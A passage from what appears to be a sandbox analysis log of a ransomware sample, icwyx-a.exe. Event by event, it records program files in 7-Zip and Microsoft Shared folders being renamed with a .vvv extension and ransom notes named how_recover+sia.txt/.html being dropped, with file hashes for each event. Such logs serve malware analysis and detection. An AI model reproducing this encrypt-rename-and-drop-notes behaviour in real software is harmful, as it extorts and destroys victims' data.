  5910. New Name:   C:\Program Files\7-Zip\Lang\sk.txt.vvv
  5911.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5912.  MD5:  d3a53836aa67fe47659c538a95b58384
  5913.  SHA1: 0de4300e1d1f81a3799cee8abadd3c77927fb83b
  5914.     328     14750
  5915. File   
  5916. Open
  5917.    
  5918. C:\Program Files\7-Zip\Lang\sl.txt
  5919.     328     12419
  5920. API Call   
  5921.    
  5922.  API Name:  Sleep   Address:  0x0041f00b
  5923.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe   DLL Name:  kernel32.dll
  5924.     328      
  5925. File   
  5926. Close
  5927.    
  5928. C:\Program Files\7-Zip\Lang\sl.txt
  5929.  MD5:  cb1cebed2166b115407314d52bdbd1bb
  5930.  SHA1: 4f4721186b076873ce21d2ba4d4743812ad0b9fe
  5931.     328     12846
  5932. File   
  5933. Rename
  5934.    
  5935. Old Name:   C:\Program Files\7-Zip\Lang\sl.txt
  5936. New Name:   C:\Program Files\7-Zip\Lang\sl.txt.vvv
  5937.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5938.  MD5:  cb1cebed2166b115407314d52bdbd1bb
  5939.  SHA1: 4f4721186b076873ce21d2ba4d4743812ad0b9fe
  5940.     328     12846
  5941. File   
  5942. Open
  5943.    
  5944. C:\Program Files\7-Zip\Lang\sq.txt
  5945.     328     11588
  5946. File   
  5947. Close
  5948.    
  5949. C:\Program Files\7-Zip\Lang\sq.txt
  5950.  MD5:  0f966e618693cce9b666467e135f90d8
  5951.  SHA1: 994755a929d92283fb5abe5ad782757bfe78d9da
  5952.     328     12014
  5953. File   
  5954. Rename
  5955.    
  5956. Old Name:   C:\Program Files\7-Zip\Lang\sq.txt
  5957. New Name:   C:\Program Files\7-Zip\Lang\sq.txt.vvv
  5958.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5959.  MD5:  0f966e618693cce9b666467e135f90d8
  5960.  SHA1: 994755a929d92283fb5abe5ad782757bfe78d9da
  5961.     328     12014
  5962. File   
  5963. Open
  5964.    
  5965. C:\Program Files\7-Zip\Lang\sr-spc.txt
  5966.     328     19089
  5967. File   
  5968. Close
  5969.    
  5970. C:\Program Files\7-Zip\Lang\sr-spc.txt
  5971.  MD5:  14122f46273218d2905cbd66d5cfec2f
  5972.  SHA1: 8c3bf669081e81f4bf0ccdb2c0604ab067f97720
  5973.     328     19518
  5974. File   
  5975. Rename
  5976.    
  5977. Old Name:   C:\Program Files\7-Zip\Lang\sr-spc.txt
  5978. New Name:   C:\Program Files\7-Zip\Lang\sr-spc.txt.vvv
  5979.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5980.  MD5:  14122f46273218d2905cbd66d5cfec2f
  5981.  SHA1: 8c3bf669081e81f4bf0ccdb2c0604ab067f97720
  5982.     328     19518
  5983. File   
  5984. Open
  5985.    
  5986. C:\Program Files\7-Zip\Lang\sr-spl.txt
  5987.     328     13378
  5988. File   
  5989. Close
  5990.    
  5991. C:\Program Files\7-Zip\Lang\sr-spl.txt
  5992.  MD5:  10608f4764b85e090afe2bab152709a2
  5993.  SHA1: ba532e0aadc9162d35f8f6179929b0c9b659df2e
  5994.     328     13806
  5995. File   
  5996. Rename
  5997.    
  5998. Old Name:   C:\Program Files\7-Zip\Lang\sr-spl.txt
  5999. New Name:   C:\Program Files\7-Zip\Lang\sr-spl.txt.vvv
  6000.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6001.  MD5:  10608f4764b85e090afe2bab152709a2
  6002.  SHA1: ba532e0aadc9162d35f8f6179929b0c9b659df2e
  6003.     328     13806
  6004. File   
  6005. Open
  6006.    
  6007. C:\Program Files\7-Zip\Lang\sv.txt
  6008.     328     13743
  6009. File   
  6010. Close
  6011.    
  6012. C:\Program Files\7-Zip\Lang\sv.txt
  6013.  MD5:  aece2f7edc30454542fb482949f82d62
  6014.  SHA1: 31677decedeb435b488e0d5250c097bb3d2af83c
  6015.     328     14158
  6016. File   
  6017. Rename
  6018.    
  6019. Old Name:   C:\Program Files\7-Zip\Lang\sv.txt
  6020. New Name:   C:\Program Files\7-Zip\Lang\sv.txt.vvv
  6021.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6022.  MD5:  aece2f7edc30454542fb482949f82d62
  6023.  SHA1: 31677decedeb435b488e0d5250c097bb3d2af83c
  6024.     328     14158
  6025. File   
  6026. Open
  6027.    
  6028. C:\Program Files\7-Zip\Lang\ta.txt
  6029.     328     20476
  6030. File   
  6031. Close
  6032.    
  6033. C:\Program Files\7-Zip\Lang\ta.txt
  6034.  MD5:  c00bf69096c8abb699fb4c84dc82b183
  6035.  SHA1: 45a6810ba4331c77bcdfe2cb5fb7de410bc268cc
  6036.     328     20894
  6037. File   
  6038. Rename
  6039.    
  6040. Old Name:   C:\Program Files\7-Zip\Lang\ta.txt
  6041. New Name:   C:\Program Files\7-Zip\Lang\ta.txt.vvv
  6042.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6043.  MD5:  c00bf69096c8abb699fb4c84dc82b183
  6044.  SHA1: 45a6810ba4331c77bcdfe2cb5fb7de410bc268cc
  6045.     328     20894
  6046. File   
  6047. Open
  6048.    
  6049. C:\Program Files\7-Zip\Lang\th.txt
  6050.     328     24112
  6051. File   
  6052. Close
  6053.    
  6054. C:\Program Files\7-Zip\Lang\th.txt
  6055.  MD5:  5834b70466f62f28f46b72c2284b2144
  6056.  SHA1: b0f964590e1f6cfcf5ae6efa4893a4fbb4d2a0de
  6057.     328     24542
  6058. File   
  6059. Rename
  6060.    
  6061. Old Name:   C:\Program Files\7-Zip\Lang\th.txt
  6062. New Name:   C:\Program Files\7-Zip\Lang\th.txt.vvv
  6063.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6064.  MD5:  5834b70466f62f28f46b72c2284b2144
  6065.  SHA1: b0f964590e1f6cfcf5ae6efa4893a4fbb4d2a0de
  6066.     328     24542
  6067. File   
  6068. Open
  6069.    
  6070. C:\Program Files\7-Zip\Lang\tr.txt
  6071.     328     13497
  6072. File   
  6073. Close
  6074.    
  6075. C:\Program Files\7-Zip\Lang\tr.txt
  6076.  MD5:  712ed51f3e4058f3ed4d5fee2b594891
  6077.  SHA1: 6f798aef72295aab1851d2b50bb34ba84900a96b
  6078.     328     13918
  6079. File   
  6080. Rename
  6081.    
  6082. Old Name:   C:\Program Files\7-Zip\Lang\tr.txt
  6083. New Name:   C:\Program Files\7-Zip\Lang\tr.txt.vvv
  6084.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6085.  MD5:  712ed51f3e4058f3ed4d5fee2b594891
  6086.  SHA1: 6f798aef72295aab1851d2b50bb34ba84900a96b
  6087.     328     13918
  6088. File   
  6089. Open
  6090.    
  6091. C:\Program Files\7-Zip\Lang\tt.txt
  6092.     328     18409
  6093. File   
  6094. Close
  6095.    
  6096. C:\Program Files\7-Zip\Lang\tt.txt
  6097.  MD5:  ff5bcc1448b87e0a31808adbf34e1811
  6098.  SHA1: 6f32d342a7551310121a0d9442231f6c28f8b8c5
  6099.     328     18830
  6100. File   
  6101. Rename
  6102.    
  6103. Old Name:   C:\Program Files\7-Zip\Lang\tt.txt
  6104. New Name:   C:\Program Files\7-Zip\Lang\tt.txt.vvv
  6105.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6106.  MD5:  ff5bcc1448b87e0a31808adbf34e1811
  6107.  SHA1: 6f32d342a7551310121a0d9442231f6c28f8b8c5
  6108.     328     18830
  6109. File   
  6110. Open
  6111.    
  6112. C:\Program Files\7-Zip\Lang\ug.txt
  6113.     328     18785
  6114. File   
  6115. Close
  6116.    
  6117. C:\Program Files\7-Zip\Lang\ug.txt
  6118.  MD5:  6ece79be54176e15c34fe87b4cae9898
  6119.  SHA1: 2a157a30e3919bf5b31c01d56f74a4f1ac1ce93a
  6120.     328     19214
  6121. File   
  6122. Rename
  6123.    
  6124. Old Name:   C:\Program Files\7-Zip\Lang\ug.txt
  6125. New Name:   C:\Program Files\7-Zip\Lang\ug.txt.vvv
  6126.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6127.  MD5:  6ece79be54176e15c34fe87b4cae9898
  6128.  SHA1: 2a157a30e3919bf5b31c01d56f74a4f1ac1ce93a
  6129.     328     19214
  6130. File   
  6131. Open
  6132.    
  6133. C:\Program Files\7-Zip\Lang\uk.txt
  6134.     328     19729
  6135. File   
  6136. Close
  6137.    
  6138. C:\Program Files\7-Zip\Lang\uk.txt
  6139.  MD5:  2a975ad79f6fb301e657f8879f22b60a
  6140.  SHA1: 7a2d9f95e7713f2204edf3509d252ade2d3f993f
  6141.     328     20158
  6142. File   
  6143. Rename
  6144.    
  6145. Old Name:   C:\Program Files\7-Zip\Lang\uk.txt
  6146. New Name:   C:\Program Files\7-Zip\Lang\uk.txt.vvv
  6147.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6148.  MD5:  2a975ad79f6fb301e657f8879f22b60a
  6149.  SHA1: 7a2d9f95e7713f2204edf3509d252ade2d3f993f
  6150.     328     20158
  6151. File   
  6152. Open
  6153.    
  6154. C:\Program Files\7-Zip\Lang\uz.txt
  6155.     328     10679
  6156. File   
  6157. Close
  6158.    
  6159. C:\Program Files\7-Zip\Lang\uz.txt
  6160.  MD5:  e0446951590b90ae6d8ed54058455396
  6161.  SHA1: f5bb3c30a7a5ce2ffccfd24ee8695d86d1152e11
  6162.     328     11102
  6163. File   
  6164. Rename
  6165.    
  6166. Old Name:   C:\Program Files\7-Zip\Lang\uz.txt
  6167. New Name:   C:\Program Files\7-Zip\Lang\uz.txt.vvv
  6168.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6169.  MD5:  e0446951590b90ae6d8ed54058455396
  6170.  SHA1: f5bb3c30a7a5ce2ffccfd24ee8695d86d1152e11
  6171.     328     11102
  6172. File   
  6173. Open
  6174.    
  6175. C:\Program Files\7-Zip\Lang\va.txt
  6176.     328     12179
  6177. File   
  6178. Close
  6179.    
  6180. C:\Program Files\7-Zip\Lang\va.txt
  6181.  MD5:  bf4ef27b4b43f749fb1398b9e3ca430e
  6182.  SHA1: 6696717fa37cbef4cede653d9a6791a08e5554e5
  6183.     328     12606
  6184. File   
  6185. Rename
  6186.    
  6187. Old Name:   C:\Program Files\7-Zip\Lang\va.txt
  6188. New Name:   C:\Program Files\7-Zip\Lang\va.txt.vvv
  6189.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6190.  MD5:  bf4ef27b4b43f749fb1398b9e3ca430e
  6191.  SHA1: 6696717fa37cbef4cede653d9a6791a08e5554e5
  6192.     328     12606
  6193. File   
  6194. Open
  6195.    
  6196. C:\Program Files\7-Zip\Lang\vi.txt
  6197.     328     13716
  6198. File   
  6199. Close
  6200.    
  6201. C:\Program Files\7-Zip\Lang\vi.txt
  6202.  MD5:  70e859bd5433ea291b92184969d0de30
  6203.  SHA1: 211b9548eb9f6d98adade16cfe122c543393d614
  6204.     328     14142
  6205. File   
  6206. Rename
  6207.    
  6208. Old Name:   C:\Program Files\7-Zip\Lang\vi.txt
  6209. New Name:   C:\Program Files\7-Zip\Lang\vi.txt.vvv
  6210.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6211.  MD5:  70e859bd5433ea291b92184969d0de30
  6212.  SHA1: 211b9548eb9f6d98adade16cfe122c543393d614
  6213.     328     14142
  6214. File   
  6215. Open
  6216.    
  6217. C:\Program Files\7-Zip\Lang\zh-cn.txt
  6218.     328     13000
  6219. File   
  6220. Close
  6221.    
  6222. C:\Program Files\7-Zip\Lang\zh-cn.txt
  6223.  MD5:  dbe72c4e03c7344b0c632f1c6998f4d1
  6224.  SHA1: 9e0be61ad3ee18c25946b00efc0d71ed83a279af
  6225.     328     13422
  6226. File   
  6227. Rename
  6228.    
  6229. Old Name:   C:\Program Files\7-Zip\Lang\zh-cn.txt
  6230. New Name:   C:\Program Files\7-Zip\Lang\zh-cn.txt.vvv
  6231.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6232.  MD5:  dbe72c4e03c7344b0c632f1c6998f4d1
  6233.  SHA1: 9e0be61ad3ee18c25946b00efc0d71ed83a279af
  6234.     328     13422
  6235. File   
  6236. Open
  6237.    
  6238. C:\Program Files\7-Zip\Lang\zh-tw.txt
  6239.     328     13087
  6240. File   
  6241. Close
  6242.    
  6243. C:\Program Files\7-Zip\Lang\zh-tw.txt
  6244.  MD5:  ed8d5061fd728b88685f174486e9ac9f
  6245.  SHA1: e1bbf0d6b13a69b9d8775df3a6a800b4241db4f3
  6246.     328     13502
  6247. File   
  6248. Rename
  6249.    
  6250. Old Name:   C:\Program Files\7-Zip\Lang\zh-tw.txt
  6251. New Name:   C:\Program Files\7-Zip\Lang\zh-tw.txt.vvv
  6252.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6253.  MD5:  ed8d5061fd728b88685f174486e9ac9f
  6254.  SHA1: e1bbf0d6b13a69b9d8775df3a6a800b4241db4f3
  6255.     328     13502
  6256. File   
  6257. Created
  6258.    
  6259. C:\Program Files\7-Zip\Lang\how_recover+sia.txt
  6260.     328      
  6261. File   
  6262. Close
  6263.    
  6264. C:\Program Files\7-Zip\Lang\how_recover+sia.txt
  6265.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6266.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6267.     328     2639
  6268. File   
  6269. Created
  6270.    
  6271. C:\Program Files\7-Zip\Lang\how_recover+sia.html
  6272.     328      
  6273. File   
  6274. Close
  6275.    
  6276. C:\Program Files\7-Zip\Lang\how_recover+sia.html
  6277.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6278.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6279.     328     9372
  6280. File   
  6281. Open
  6282.    
  6283. C:\Program Files\7-Zip\License.txt
  6284.     328     1927
  6285. File   
  6286. Close
  6287.    
  6288. C:\Program Files\7-Zip\License.txt
  6289.  MD5:  51906a38eee425125ec189f12e81ba5a
  6290.  SHA1: c070ef300ed43d440f21d547e81e0c30285abba8
  6291.     328     2350
  6292. File   
  6293. Rename
  6294.    
  6295. Old Name:   C:\Program Files\7-Zip\License.txt
  6296. New Name:   C:\Program Files\7-Zip\License.txt.vvv
  6297.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6298.  MD5:  51906a38eee425125ec189f12e81ba5a
  6299.  SHA1: c070ef300ed43d440f21d547e81e0c30285abba8
  6300.     328     2350
  6301. File   
  6302. Open
  6303.    
  6304. C:\Program Files\7-Zip\readme.txt
  6305.     328     1565
  6306. File   
  6307. Close
  6308.    
  6309. C:\Program Files\7-Zip\readme.txt
  6310.  MD5:  b39d31a3e29a2e245be14696c20474ff
  6311.  SHA1: 22477278bd1d23c4d16b6904d55f40b10e408716
  6312.     328     1982
  6313. File   
  6314. Rename
  6315.    
  6316. Old Name:   C:\Program Files\7-Zip\readme.txt
  6317. New Name:   C:\Program Files\7-Zip\readme.txt.vvv
  6318.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6319.  MD5:  b39d31a3e29a2e245be14696c20474ff
  6320.  SHA1: 22477278bd1d23c4d16b6904d55f40b10e408716
  6321.     328     1982
  6322. File   
  6323. Created
  6324.    
  6325. C:\Program Files\7-Zip\how_recover+sia.txt
  6326.     328      
  6327. File   
  6328. Close
  6329.    
  6330. C:\Program Files\7-Zip\how_recover+sia.txt
  6331.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6332.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6333.     328     2639
  6334. File   
  6335. Created
  6336.    
  6337. C:\Program Files\7-Zip\how_recover+sia.html
  6338.     328      
  6339. File   
  6340. Close
  6341.    
  6342. C:\Program Files\7-Zip\how_recover+sia.html
  6343.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6344.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6345.     328     9372
  6346. File   
  6347. Created
  6348.    
  6349. C:\Program Files\Common Files\DESIGNER\how_recover+sia.txt
  6350.     328      
  6351. File   
  6352. Close
  6353.    
  6354. C:\Program Files\Common Files\DESIGNER\how_recover+sia.txt
  6355.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6356.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6357.     328     2639
  6358. File   
  6359. Created
  6360.    
  6361. C:\Program Files\Common Files\DESIGNER\how_recover+sia.html
  6362.     328      
  6363. File   
  6364. Close
  6365.    
  6366. C:\Program Files\Common Files\DESIGNER\how_recover+sia.html
  6367.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6368.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6369.     328     9372
  6370. File   
  6371. Created
  6372.    
  6373. C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+sia.txt
  6374.     328      
  6375. File   
  6376. Close
  6377.    
  6378. C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+sia.txt
  6379.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6380.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6381.     328     2639
  6382. File   
  6383. Created
  6384.    
  6385. C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+sia.html
  6386.     328      
  6387. File   
  6388. Close
  6389.    
  6390. C:\Program Files\Common Files\Microsoft Shared\DW\how_recover+sia.html
  6391.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6392.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6393.     328     9372
  6394. File   
  6395. Created
  6396.    
  6397. C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+sia.txt
  6398.     328      
  6399. File   
  6400. Close
  6401.    
  6402. C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+sia.txt
  6403.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6404.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6405.     328     2639
  6406. File   
  6407. Created
  6408.    
  6409. C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+sia.html
  6410.     328      
  6411. File   
  6412. Close
  6413.    
  6414. C:\Program Files\Common Files\Microsoft Shared\EQUATION\1033\how_recover+sia.html
  6415.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6416.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6417.     328     9372
  6418. File   
  6419. Created
  6420.    
  6421. C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+sia.txt
  6422.     328      
  6423. File   
  6424. Close
  6425.    
  6426. C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+sia.txt
  6427.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6428.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6429.     328     2639
  6430. File   
  6431. Created
  6432.    
  6433. C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+sia.html
  6434.     328      
  6435. File   
  6436. Close
  6437.    
  6438. C:\Program Files\Common Files\Microsoft Shared\EQUATION\how_recover+sia.html
  6439.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6440.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6441.     328     9372
  6442. File   
  6443. Created
  6444.    
  6445. C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+sia.txt
  6446.     328      
  6447. File   
  6448. Close
  6449.    
  6450. C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+sia.txt
  6451.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6452.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6453.     328     2639
  6454. File   
  6455. Created
  6456.    
  6457. C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+sia.html
  6458.     328      
  6459. File   
  6460. Close
  6461.    
  6462. C:\Program Files\Common Files\Microsoft Shared\EURO\how_recover+sia.html
  6463.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6464.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6465.     328     9372
  6466. File   
  6467. Created
  6468.    
  6469. C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+sia.txt
  6470.     328      
  6471. File   
  6472. Close
  6473.    
  6474. C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+sia.txt
  6475.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6476.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6477.     328     2639
  6478. File   
  6479. Created
  6480.    
  6481. C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+sia.html
  6482.     328      
  6483. File   
  6484. Close
  6485.    
  6486. C:\Program Files\Common Files\Microsoft Shared\Filters\how_recover+sia.html
  6487.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6488.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6489.     328     9372
  6490. File   
  6491. Open
  6492.    
  6493. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS
  6494.     328     15067
  6495. File   
  6496. Close
  6497.    
  6498. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS
  6499.  MD5:  d3007c3e7b0e5b30dfc1295e449f440f
  6500.  SHA1: a1022e7b674ab0d235791f4910f4c368b673288e
  6501.     328     15486
  6502. File   
  6503. Rename
  6504.    
  6505. Old Name:   C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS
  6506. New Name:   C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.EPS.vvv
  6507.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6508.  MD5:  d3007c3e7b0e5b30dfc1295e449f440f
  6509.  SHA1: a1022e7b674ab0d235791f4910f4c368b673288e
  6510.     328     15486
  6511. File   
  6512. Open
  6513.    
  6514. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG
  6515.     328     1061
  6516. File   
  6517. Close
  6518.    
  6519. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG
  6520.  MD5:  fb07fd36bd0824911a539ecc66364d04
  6521.  SHA1: 90f55ec08f6b654ce022e46c9c01ed85797f43a4
  6522.     328     1486
  6523. File   
  6524. Rename
  6525.    
  6526. Old Name:   C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG
  6527. New Name:   C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.JPG.vvv
  6528.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6529.  MD5:  fb07fd36bd0824911a539ecc66364d04
  6530.  SHA1: 90f55ec08f6b654ce022e46c9c01ed85797f43a4
  6531.     328     1486
  6532. File   
  6533. Open
  6534.    
  6535. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG
  6536.     328     1682
  6537. File   
  6538. Close
  6539.    
  6540. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG
  6541.  MD5:  91c663e38812ffe892bc660c83e69597
  6542.  SHA1: 26fa5da4c53031a1c61d6a3029a38b1f15f6e556
  6543.     328     2110
  6544. File   
  6545. Rename
  6546.    
  6547. Old Name:   C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG
  6548. New Name:   C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.PNG.vvv
  6549.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  6550.  MD5:  91c663e38812ffe892bc660c83e69597
  6551.  SHA1: 26fa5da4c53031a1c61d6a3029a38b1f15f6e556
  6552.     328     2110
  6553. File   
  6554. Created
  6555.    
  6556. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+sia.txt
  6557.     328      
  6558. File   
  6559. Close
  6560.    
  6561. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+sia.txt
  6562.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6563.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6564.     328     2639
  6565. File   
  6566. Created
  6567.    
  6568. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+sia.html
  6569.     328      
  6570. File   
  6571. Close
  6572.    
  6573. C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\how_recover+sia.html
  6574.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6575.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6576.     328     9372
  6577. File   
  6578. Created
  6579.    
  6580. C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+sia.txt
  6581.     328      
  6582. File   
  6583. Close
  6584.    
  6585. C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+sia.txt
  6586.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6587.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6588.     328     2639
  6589. File   
  6590. Created
  6591.    
  6592. C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+sia.html
  6593.     328      
  6594. File   
  6595. Close
  6596.    
  6597. C:\Program Files\Common Files\Microsoft Shared\Help\how_recover+sia.html
  6598.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6599.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6600.     328     9372
  6601. File   
  6602. Created
  6603.    
  6604. C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+sia.txt
  6605.     328      
  6606. File   
  6607. Close
  6608.    
  6609. C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+sia.txt
  6610.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6611.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6612.     328     2639
  6613. File   
  6614. Created
  6615.    
  6616. C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+sia.html
  6617.     328      
  6618. File   
  6619. Close
  6620.    
  6621. C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\how_recover+sia.html
  6622.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6623.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6624.     328     9372
  6625. File   
  6626. Created
  6627.    
  6628. C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+sia.txt
  6629.     328      
  6630. File   
  6631. Close
  6632.    
  6633. C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+sia.txt
  6634.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6635.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6636.     328     2639
  6637. File   
  6638. Created
  6639.    
  6640. C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+sia.html
  6641.     328      
  6642. File   
  6643. Close
  6644.    
  6645. C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\how_recover+sia.html
  6646.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6647.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6648.     328     9372
  6649. File   
  6650. Created
  6651.    
  6652. C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+sia.txt
  6653.     328      
  6654. File   
  6655. Close
  6656.    
  6657. C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+sia.txt
  6658.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6659.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6660.     328     2639
  6661. File   
  6662. Created
  6663.    
  6664. C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+sia.html
  6665.     328      
  6666. File   
  6667. Close
  6668.    
  6669. C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ\how_recover+sia.html
  6670.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6671.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6672.     328     9372
  6673. File   
  6674. Created
  6675.    
  6676. C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+sia.txt
  6677.     328      
  6678. File   
  6679. Close
  6680.    
  6681. C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+sia.txt
  6682.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6683.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6684.     328     2639
  6685. File   
  6686. Created
  6687.    
  6688. C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+sia.html
  6689.     328      
  6690. File   
  6691. Close
  6692.    
  6693. C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\how_recover+sia.html
  6694.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  6695.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  6696.     328     9372
  6697. File   
  6698. Created
  6699.    
  6700. C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+sia.txt
  6701.     328      
  6702. File   
  6703. Close
  6704.    
  6705. C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+sia.txt
  6706.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  6707.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  6708.     328     2639
  6709. File   
  6710. Created
  6711.    
  6712. C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\how_recover+sia.html
  6713.     328      
  6714. File   
  6715. Close
  6716.    
